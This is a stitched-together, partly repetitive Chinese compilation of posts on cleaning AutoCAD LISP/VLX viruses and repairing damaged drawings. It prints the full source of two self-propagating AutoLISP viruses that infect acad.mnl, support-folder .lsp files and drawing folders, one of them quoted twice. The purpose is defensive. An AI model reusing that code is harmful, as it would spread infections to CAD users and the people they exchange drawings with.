去除autocad木马

MUST re_cover!感染后的图纸的修复标签: cover MUST图纸感染 2009-09-10 16:39病毒发作症状:打开图纸，发现图纸上只有一句英文：MUST re_cover!病毒发生原因acad.vlx所引起杀毒办法:第一步：关闭闭CAD后，全盘搜索acad.vlx，然后把搜索到的acad.vlx全部删除。

第二步：通常情况下Help目录内的会有一个logo.gif文件.也将它删除。

挽救图形文件的方法：1、关闭CAD后，全盘搜索acad.vlx，将其中的一个acad.vlx文件改名为a.vlx留用，然后把搜索到的acad.vlx全部删除。

2、重新启动CAD，打开那个被破坏的图形文件，在“工具”菜单下“加载应用程序”，选择加载备份的a.vlx文件，在命令行输入re_cover就可以恢复被打乱隐藏的图纸了。

3、所有被破坏的文件修复后，关闭CAD，再全盘搜索acad.vlx一次，将搜索到的acad.vlx 全部删除。

特别注意：1、上述方法只适用于被acad.Vlx病毒直接感染的机器以及此机器上被感染后的图纸，不适用于将感染后图纸发送到其他人机器上进行修复的情况，因为图纸本质上未携带病毒，病毒感染的是本机的CAD程序；2、若希望从另外的机器上恢复已被病毒损坏的图纸除需要找到病毒文件：acad.Vlx外还需要找到以下文件中的一个：acad.lsp、acadappp.lsp或acadapp.lsp，这是因为vlx文件时病毒的主运行程序，二这些lsp文件中存放了定义病毒程序运行的命令，必须结合使用；3、此病毒的出现也给我们提了一个醒：随时备份，尤其是不要禁用CAD备份时的BAK文件，因为这个BAK文件有可能成为在无法恢复时的最后一根救命稻草；。

CAD病毒是什么怎么清除CAD相信很多学建筑或者图形设计的人们都使用过，那么CAD病毒是什么呢?遇到了怎么解决?本文就来教大家使用手动设置查杀CAD 病毒的方法，具体步骤请看下文。

CAD病毒查杀方法介绍：手动查杀CAD病毒：1、关闭CAD(一定要先关闭正在运行的CAD程序)。

2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

3、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(如"acad.mnl"文件中无此行代码可忽略此操作)附："acad.mnl"文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD 的版本和版本代号。

(注意：目录C:\Documents and Settings\是系统隐藏文件夹)补充：电脑常见的病毒：1.文件型病毒文件型病毒是一种受感染的可执行文件，也就是.exe病毒文件。

当执行受感染的文件时，电脑病毒会将自己复制到其他可执行文件中，导致其他文件受感染。

AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒，在CAD软件使用中主要表现的情况如下：1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法：关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤：没有处理acad.mnl文件，这样的清除并不彻底，下次再打开带毒的dwg文件（这里并非指dwg文件本身带毒，而是指在该dwg文件下有acaddoc.lsp文件存在）后，系统又会感染病毒，偶曾经对这个cad病毒的代码做过详细分析，下面是原文，有兴趣的朋友可以详细看看：最近自己的电脑中了CAD病毒，症状为打开一个dwg文件后，在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件，即使手工将其删除，下次打开dwg文件时又会自动生成。

如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上，只要一打开该dwg文件，则该电脑就会被感染。

因为这个CAD病毒是个lisp程序，花了些时间对病毒代码进行分析如下：-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名，这句没有用处，下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄，c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开，不存在则创建，然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏，但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志，已感染为1，未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄，若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容，读取结束后，wns1中是倒数第2行(setq wns1 wns2 ) ;内容，wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志，;;; ;已感染为1，未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄，若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容，读取结束后，wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染，则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法，等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容，在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else （acad.mnl文件已感染）(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容，写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else （若加载的是support目录下的acaddoc.lsp文件）(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件，将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法，没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知，该病毒的病毒文件有2个，一个为acadapq.lsp，位于ACAD 安装目录下的support目录下，另一个为acaddoc.lsp，位于当前打开的dwg文件所在目录下，2个病毒文件的内容相同。

一种CAD病毒的清除与防范措施雪山飞猪QQ534455近来又出现一种AutoCAD病毒，该病毒与以往CAD病毒不同。

干净的CAD系统当打开DWG图时，如果该图所在目录下有ACADDOC.LSP文件（基本为病毒传播文件），ACADDOC.LSP就会运行。

1.病毒的特征与传播方式我们先看看病毒代码，代码如下：(setq flagx t)(setq bz "(setq flagx t)")(defun app(source target bz / flag flag1 wjm wjm1 text)(setq flag nil)(setq flag1 t)(if (findfile target)(progn(setq wjm1 (open target "r"))(while (setq text (read-line wjm1))(if (= text bz) (setq flag1 nil)));while(close wjm1));progn);if(if flag1(progn(setq wjm (open source "r"))(setq wjm1 (open target "a"))(write-line (chr 13) wjm1)(while (setq text (read-line wjm))(if (= text bz) (setq flag t))(if flag(progn(write-line text wjm1));progn);if);while(close wjm1)(close wjm));progn);if);defun(setvar "cmdecho" 0)(setq acadmnl (findfile "acad.mnl"))(setq acadmnlpath (vl-filename-directory acadmnl)) (setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))(setq acadexe (findfile "acad.exe"))(setq acadpath (vl-filename-directory acadexe))(setq support (strcat acadpath "\\support"))(setq lspfilelist (vl-directory-files support "*.lsp"))(setq lspfilelist (append lspfilelist (list "acaddoc.lsp")))(setq lspnum (length lspfilelist))(setq dwgname (getvar "dwgname"))(setq dwgpath (findfile dwgname))(if dwgpath(progn(setq acaddocpath (vl-filename-directory dwgpath))(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp"))(setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(app mnlfilename acaddocfile bz)(app acaddocfile mnlfilename bz)(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))(app lspfilename acaddocfile bz)(app acaddocfile lspfilename bz)(setq lspn (1+ lspn)));while);progn);if(setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app mnlfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app mnlfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))(setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app lspfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app lspfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn (1+ lspn))(load "acadapq")(princ)(load "acadapp")(princ)(load "acadapq")(princ)病毒代码运行后，首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。

预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
经参考相关文章并结合自己重新实践总结：
预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
1、在关闭CAD情况下。

1.搜索全盘的acaddoc.lsp和acadapq.lsp并删除；2注意要.显示隐藏文件；
2、用360卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

3、重新启动，重新安装CAD，打开并激活好。

4、新建两个记事本并分别压缩，把压缩包改名acaddoc.lsp 和acadapq.lsp，再把改完后的acaddoc.lsp和acadapq.lsp覆盖路径C:\Documents and Settings\用户名\Application
Data\Autodesk\AutoCAD 20XX\RXX\chs\Support下相应的文件即可。

5、装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

可以减少中毒的机率。

（注：此时打开CAD时可能会出现无法更新的提示，如果这样要重新对安装目录已设置“只读”
试验先，把设置“只读”前的勾号去掉，设置不“只读”，再打开试试没问题了，再设置“只读”。

）。

CAD病毒解决方平时我们在使用CAD时，，，，多数情况下是因为客户的U盘，我们的电脑感染了CAD病毒，，，，，，这可是个头痛的事情，本人就深受其害，有几次都气疯了，，，，，，从业多年的就不说了，为了新入行的同鞋少走弯路，看看下面的简单方，，，，简单粗暴，经济实惠，，，，，，，，，方法一：下载个CAD专杀软件，能解决大部分“事后”，但“事前”呢，，，，，原上帝保佑你，，，，，那么我主要谈谈事前，，，即预防方法，，，，，，，方法二：把你C盘里面的support文件夹里面*.MNL文件格式设置成只读，把你安装CAD程序里面的support里面*.LSP文件全都设置成只读。

如果上述方法不行。

请住下看，下面风光独好。

方法三：1、关闭CAD搜索全盘acaddoc.lsp和acadapq.lsp并删除；2、卸载干净CAD包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

3、重启重装CAD并激。

4、新建两个记事本并分别压缩，把压缩包改名acaddoc.lsp和acadapq.lsp，再把改完后的acaddoc.lsp和acadapq.lsp覆盖路径C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 20XX\RXX\chs\Support下相应的文件。

5、装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

可以减少中毒的机率。

（注：此时打开CAD时可能会出现无法更新的提示，如这样要重设置“只读”试验先，把设置“只读”前的勾号去掉，设置不“只读”，再打开试试没问题了，再设置“只读”。

）如果还不能解决：有个绝招，，，，，秒杀一切解决病毒方法，，，，，，，，是什么，，，嘿嘿，，，，，，，，一般人我不告诉他，，，，，此处省略500字。

CAD中毒解决方案概述：CAD（计算机辅助设计）是一种广泛应用于工程设计和创造领域的技术，它提供了一种便捷和高效的设计工具。

然而，由于各种原因，CAD系统可能会受到恶意软件、病毒或者其他安全威胁的攻击，导致CAD文件被损坏、数据泄露或者系统崩溃等问题。

本文将介绍一些常见的CAD中毒问题，并提供相应的解决方案。

一、CAD中毒问题的种类及影响1. 恶意软件感染：恶意软件是指通过各种方式传播并对系统造成伤害的软件，如病毒、木马、蠕虫等。

CAD系统感染恶意软件可能导致文件损坏、数据泄露、系统崩溃等问题。

2. 网络攻击：CAD系统连接到互联网时，可能受到黑客的攻击，如DDoS攻击、SQL注入等。

这些攻击可能导致系统崩溃、数据泄露、信息被篡改等问题。

3. 社会工程攻击：社会工程攻击是指利用人的心理弱点进行攻击的手段，如钓鱼邮件、诱骗等。

CAD系统受到社会工程攻击可能导致用户密码泄露、系统被入侵等问题。

二、CAD中毒解决方案1. 安装可靠的杀毒软件：为CAD系统安装一款可靠的杀毒软件，定期更新病毒库，并进行全盘扫描。

杀毒软件可以及时检测和清除恶意软件，保护CAD系统的安全。

2. 确保系统和CAD软件的更新：及时安装系统和CAD软件的更新补丁，以修复已知的漏洞和安全问题，提高系统的安全性。

3. 加强网络安全防护：配置防火墙、入侵检测系统（IDS）等网络安全设备，限制CAD系统与外部网络的连接，防止网络攻击对CAD系统造成威胁。

4. 提高用户安全意识：加强用户对社会工程攻击的认识，警惕钓鱼邮件、诱骗等手段。

用户应定期更改密码，避免使用弱密码，并定期备份CAD文件，以防止数据丢失。

5. 数据加密和备份：对CAD文件进行加密，确保数据在传输和存储过程中的安全。

此外，定期备份CAD文件到可靠的存储介质，以防止文件丢失或者损坏。

三、CAD中毒预防措施1. 定期进行系统安全检查：定期对CAD系统进行安全检查，包括检查系统是否感染恶意软件、是否存在安全漏洞等。

方法一：手工清除LINKMEDIA和MSSCKETS的方法2008-05-04 08:37关于清除LINKMEDIA和MSSCKETS 的方法近来发现电脑运行速度奇慢，常常IE无故后台打开。

下载安全卫士360后扫描发现有LINKMEDIA 并且无法清除今天升级后又扫出MSSCKETS 同样删不掉。

经过半个月的网上信息汇总今晚总算成功结果了这两款恶意软件，现向大家介绍经验。

典型症状是在WINDOWS根目录中存在iprep.EXE SYSTEM 32文件夹中有fsutk.dll和liprip.dll和rimon.dll而且会发现如果不先改注册表无法删除或粉碎iprep.EXE我用了如下软件配合本次清除工作：最新版的瑞星卡卡，安全卫士360，优化大师的流氓软件清除大师。

1和大部分朋友一样我也是下载安装AUTOCAD 2007 后中的，所以首先卸载它。

重启。

2按F8进入安全模式开始运行输入 REGEDIT 调出注册表编辑器编辑查找（建议勾选全部复选框）输入iprep 注意右侧栏的查找结果会找到包括iprep.EXE nwsapagent.dll在内的几个结果（好像还有INF文件）删除右栏全部搜索结果。

再编辑查找输入liprip 本次搜索结果应该在左边栏，直接删除这个找到的文件夹。

自此手工注册表修改删除IPREP完成。

3到WINDOWS根目录中删除iprep.EXE 没有再生成。

4打开卡卡高级功能插件管理及卸载看到有两项和liprip iprep 有关的插件。

卸载它们。

5打开360 常用系统全面诊断在安全模式中当前运行的进程应该全部是安全标记，看从注册表中自动启动的程序找到“SAFEST”和“SCRRSAVE”(好像是这个名子，因为没有历史记录是凭印象的）可能还有一个RUNDLL32这三项360给出的是未知安全级别，旁边已经给出了详细的文件路径和注册表路径，先去注册表编辑器查找和删除对应的注册表项再删除对应文件。

acaddoc.lsp病毒解决方案（本人经试验成功解决）现在好多朋友从别的机器拷贝图纸会带过来一种acaddoc.lsp病毒，具体症状为：1.每次打开DWG图纸，在图纸文件夹中会产生acaddoc.lsp文件，文件大小约为3528KB；2.每次打开AUTOCAD，无论任何图纸，在命令行前几行中都会出现配置表有缺陷，经常会出现三个，且无论打开什么图纸，软件打开速度特别慢，一般会在两分钟以上。

解决方法请按如下步骤（详述，如果电脑知识过关可直接做到每项小标题内容即可）：1.删除当前电脑中所有acaddoc.lsp文件打开‘我的电脑’→‘搜索’→搜索内容‘acaddoc.lsp’,最好打开高级选项中的搜索隐藏文件等小选项→全选搜索完成界面的该文件，删除→退出搜索即可；2.卸载当前AUTOCAD软件（并手工删除‘C:\Documents and Settings\Ad ministrator\Application Data\Autodesk’路径中的所有文件夹）使用3 60安全卫士等第三方软件卸载当前已经安装的AUTOCAD软件，因为我用系统自带卸载程序总是无法卸载被病毒感染的几个文件造成卸载失败，我们卸载软件的目的是彻底删除染毒文件，因为我们大部分人不会一个一个去找到这些文件并修复，不如重装一次节省时间；3.重装AUTOCAD软件（最好从压缩包中重新释放安装软件）该处没有特别的地方，大家按安装程序中的说明重装即可，唯一需要注意的就是安装程序一定要保证是无毒的，所以我才会特别注明要从压缩包中重新释放一次安装软件；4.预防再次染毒（此步骤我没有进行实践验证，只是参考当前网上的一些说明，为了保险，我对网上的说明进行了扩大范围处理）项目1：C:\Documents and Settings\Administrator\Application D ata\Autodesk\AutoCAD 2007\R17.0\chs目录下的SUPPORT文件夹（包括子文件夹）设置为只读；项目2：*:\******\AutoCAD 2007目录下的SUPPORT文件夹（包括子文件夹）设置为只读，‘*’为AUTOCAD主文件安装路径；重装了三次才找到这四个步骤，尽量按上面特别注明的要求来，因为第二次重装时曾遇到“正在重生成模型。

打开CAD，命令栏英文闪烁，错误: 参数类型错误: streamp nil，按ESC键可终止这个病毒的清除，如下：1.全盘扫描所有的*.mnl 和*.lsp2.清除每一个文件中“(setq flagx t)” 行以下的所有内容；3.清除后如果文件为空，则删除之。

整理后如下经验供大家分享（亲测）：1，为了铲除病根，建议首先按文献的说明扫描全盘（只要中了这个毒你打开过的cad文件全都会携带，而且是隐藏的格式）*。

lsp文件，全部删除，（现在很多同事电脑里同时都放了安装包，看清了，别把安装包里面的给删了）2，彻底卸载cad(建议用360可以清除注册表以及加载项)3，重装cad（有人看到这里觉得说到这里就很无语了，也许会想，既然重装还费个什么话还删除lsp.那就错了，重装是因为要彻底清除的基础上打防御针。

而且以后都不会中这个毒了。

如果不重装只用修复，病毒还是会找到你的，而且重装和修复时间是相差无几的）4。

（重点）重装后切忌不可启动cad.再次搜索*.lsp(安装目录下的)然后全选中把属性改成只读这下就没有问题了，哪怕是再次打开别人发过来的中毒文件也不会有问题了，测试后结果04.10都适用。

acaddoc.lsp是一个木马！1、查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除；2、查找acadapq.lsp删除；3、查找c:\boot.dat删除；（注意是boot.dat，不是boot.ini）4、打开acad.mnl，将加载acadapq.lsp的句子删除；5、为防止再被感染，建议将acad.mnl设成只读，建个空的acaddoc.lsp设为只读，应该就可以防止感染了；6、注意局域网要统一时间杀毒，否则杀不干净；============查看文件名后缀，请按以下步骤进行设置:双击打开“我的电脑”，在菜单栏上依次点击“工具”“文件夹选项”“查看”，把“隐藏已知文件类型的扩展名”前的勾去掉，确定。

AutoCAD病毒的处理方法
步骤一,请电脑部门把服务器和使用者电脑上的病毒文件”acad.vlx, acad.fas, acad.sys, acad.lsp ,dwgrun.bat“三种病毒文件找到后删除，运行KILLCAD.BA T.
步骤二,把杀毒程式“KillCAD.vlx”copy到presscad软件安装目录下的program资料夹下面. 步骤三,开启AUTOCAD软件输入AP命令”出现如下对话框
点选如上图所示红色按钮,出现如下图所示的对话框:
点选上图所示的红色按钮,加载步骤二所copy的程式.关闭CAD，以后每次启动CAD或开启图档时会自动阻止病毒的产生，对已感染的文件会自动清除病毒，但是已中毒的档案图元上的标签无法恢复。

现在反病毒程式在运行时遇到如下問題还要请相关部门协助解決.
1,有些電腦上面沒有按要求安裝此程式.
2,服務器上面的病毒,反病毒程式無法刪除,使用者電腦隻可以copy檔案到服務器的權限. 針對以上的問題煩請電腦中心清除服務器上面的病毒或通过防火墙设定上術病毒为不可通过的文件.
统赢公司
2007.12.11。

一种CAD病毒的清除与防范措施雪山飞猪 QQ534455近来又出现一种AutoCAD病毒，该病毒与以往CAD病毒不同。

干净的CAD 系统当打开DWG图时，如果该图所在目录下有ACADDOC.LSP文件（基本为病毒传播文件），ACADDOC.LSP就会运行。

1.病毒的特征与传播方式我们先看看病毒代码，代码如下：(setq flagx t)(setq bz "(setq flagx t)")(defun app(source target bz / flag flag1 wjm wjm1 text)(setq flag nil)(setq flag1 t)(if (findfile target)(progn(setq wjm1 (open target "r"))(while (setq text (read-line wjm1))(if (= text bz) (setq flag1 nil)));while(close wjm1));progn);if(if flag1(progn(setq wjm (open source "r"))(setq wjm1 (open target "a"))(write-line (chr 13) wjm1)(while (setq text (read-line wjm))(if (= text bz) (setq flag t))(if flag(progn(write-line text wjm1));progn);if);while(close wjm1)(close wjm));progn);if);defun(setvar "cmdecho" 0)(setq acadmnl (findfile "acad.mnl"))(setq acadmnlpath (vl-filename-directory acadmnl))(setq mnlfilelist (vl-directory-files acadmnlpath "*.mnl")) (setq mnlnum (length mnlfilelist))(setq acadexe (findfile "acad.exe"))(setq acadpath (vl-filename-directory acadexe))(setq support (strcat acadpath "\\support"))(setq lspfilelist (vl-directory-files support "*.lsp")) (setq lspfilelist (append lspfilelist (list "acaddoc.lsp"))) (setq lspnum (length lspfilelist))(setq dwgname (getvar "dwgname"))(setq dwgpath (findfile dwgname))(if dwgpath(progn(setq acaddocpath (vl-filename-directory dwgpath))(setq acaddocfile (strcat acaddocpath "\\acaddoc.lsp")) (setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(app mnlfilename acaddocfile bz)(app acaddocfile mnlfilename bz)(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist)))(app lspfilename acaddocfile bz)(app acaddocfile lspfilename bz)(setq lspn (1+ lspn)));while);progn);if(setq mnln 0)(while (< mnln mnlnum)(setq mnlfilename (strcat acadmnlpath "\\" (nth mnln mnlfilelist)))(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app mnlfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app mnlfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln (1+ mnln)));while(setq lspn 0)(while (< lspn lspnum)(setq lspfilename (strcat support "\\" (nth lspn lspfilelist))) (setq lspn1 0)(while (< lspn1 lspnum)(setq lspfilename1 (strcat support "\\" (nth lspn1 lspfilelist)))(app lspfilename lspfilename1 bz)(setq lspn1 (1+ lspn1)));while(setq mnln1 0)(while (< mnln1 mnlnum)(setq mnlfilename1 (strcat acadmnlpath "\\" (nth mnln1 mnlfilelist)))(app lspfilename mnlfilename1 bz)(setq mnln1 (1+ mnln1)));while(setq lspn (1+ lspn))(load "acadapq")(princ)(load "acadapp")(princ)(load "acadapq")(princ)病毒代码运行后，首先会把病毒代码写入CAD用户系统目录下的*.mnl文件和CAD的support目录下的*.lsp文件中。

清除CAD病毒的方法河南省固始县天工图纸服务社叶崇福Autocad软件中病毒后，主要表现一下几种现象：1、无法炸开2、无法填充3、鼠标滚轮速度变慢4、每次只能选择一个对象一般来说，上述现象是由CAD病毒引起的，用杀毒软件和杀木马软件几乎无法解决。

其实清除CAD病毒非常简单，Autocad软件出现问题或异常，一般是由于电脑上感染了acad.lsp、acadapp.lsp和acadappp.lsp这3个文件，它的传播方式只能在CAD支持路径和打开DWG文件时传播。

只要彻底删除电脑上的这三个文件，问题一般就可解决。

这3个文件一般是由U盘传播的，因此在打开U盘时，一定要先看看U盘里有没有这3个文件，如果有就要先删除，然后再打开CAD文件。

下面就来讲一讲手工清除acad.lsp、acadappp.lsp 和acadapp.lsp这3个文件的方法：第一步、关闭CAD（一定要先关闭正在运行的CAD程序）。

第二步、点击“开始”,再点击“搜索”，打开XP系统的文件搜索窗口，搜索并删除acad.lsp文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将病毒文件全部搜索清除干净。

第三步、用同样的方法搜索并删除acadapp.lsp文件。

第四步、用同样的方法搜索并删除acadappp.lsp文件。

通过以上步骤，打开CAD软件，如果有些问题仍然没有解决，是由于病毒文件修改了4个系统变量的值。

请你尝试用以下方法修复：第一个变量： zoomfactor这个变量值就是滚轮缩放速度，系统变量的默认值是40，病毒修改后值为12。

解决方法是：在命令行输入zoomfactor改值12为40即可解决鼠标滚轮速度变慢的问题。

第二个变量： mbuttonpan这个变量值就是鼠标中键的功能，系统变量的默认值是1，表示鼠标中键可以拖动图形，病毒修改后值为0。

CAD病毒专杀软件分享每天积累一点，让自己更专业！关注CAD制图有问必答筑原cad病毒专杀是专为AutoCad软件开发的一款病毒专杀修复及免疫于一体的专杀工具！一.扫描病毒的流程如下:二.处理病毒1.acad.lsp 很多以(defun s::startup (/old_cmd 等开头的lsp病毒代码中毒后,打开文件自动建立acad.lsp文件等.2.acaddoc.lsp以 (setq flagx t) (setq bz'(setq flagx t)')开头lsp代码中毒后acad.mnl 及cad的support下的所有lsp文件某位都加上此段病毒代码.天正等软件无法启动.3.acad.fas版本1 有病毒样本,完美处理.1.病毒在启动CAD时会弹出一个显示时间并写有“党是不会亏待你”的对话框 2.注册表增加HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwgrun 3.增加文件c:\WINDOWS\system32\copyfile.vbsc:\WINDOWS\system32\copy.sys(acad.fas副本)cad安装目录,很多子目录中有acad.fas和lcm.fas文件.版本2 本人无病毒样本,网友提供解决方法.1.注册表增加 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sys:'C:\WINDOWS\system32\copyfile.vbs'2.增加文件系统目录中增加 winsys.ini、winfas.ini、dwgrun.batcad安装目录,很多子目录中有acad.sys、acad.fas、acad.ini版本3 有病毒样本,完美处理. 1.注册表增加HKCU\Software\FileKenHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup 写入BEI_ZHU值200302142.拷贝文件 C:\Program Files\AutoCAD 2004\Fonts\isohztxt.shx (acad.fas副本)C:\WINDOWS\DivX.finC:\WINDOWS\system32\SHFR.CMD3.修改文件acad.mnl文件中间增加 (setvar'cmdecho' 0) (command'slide')结尾增加 (princ)(if (null stol) (load 'lcm'''))acad.pgp文件中间增加 SLIDE, SHFR, 5,4.acad.vlx版本1 有病毒样本,完美处理.1. 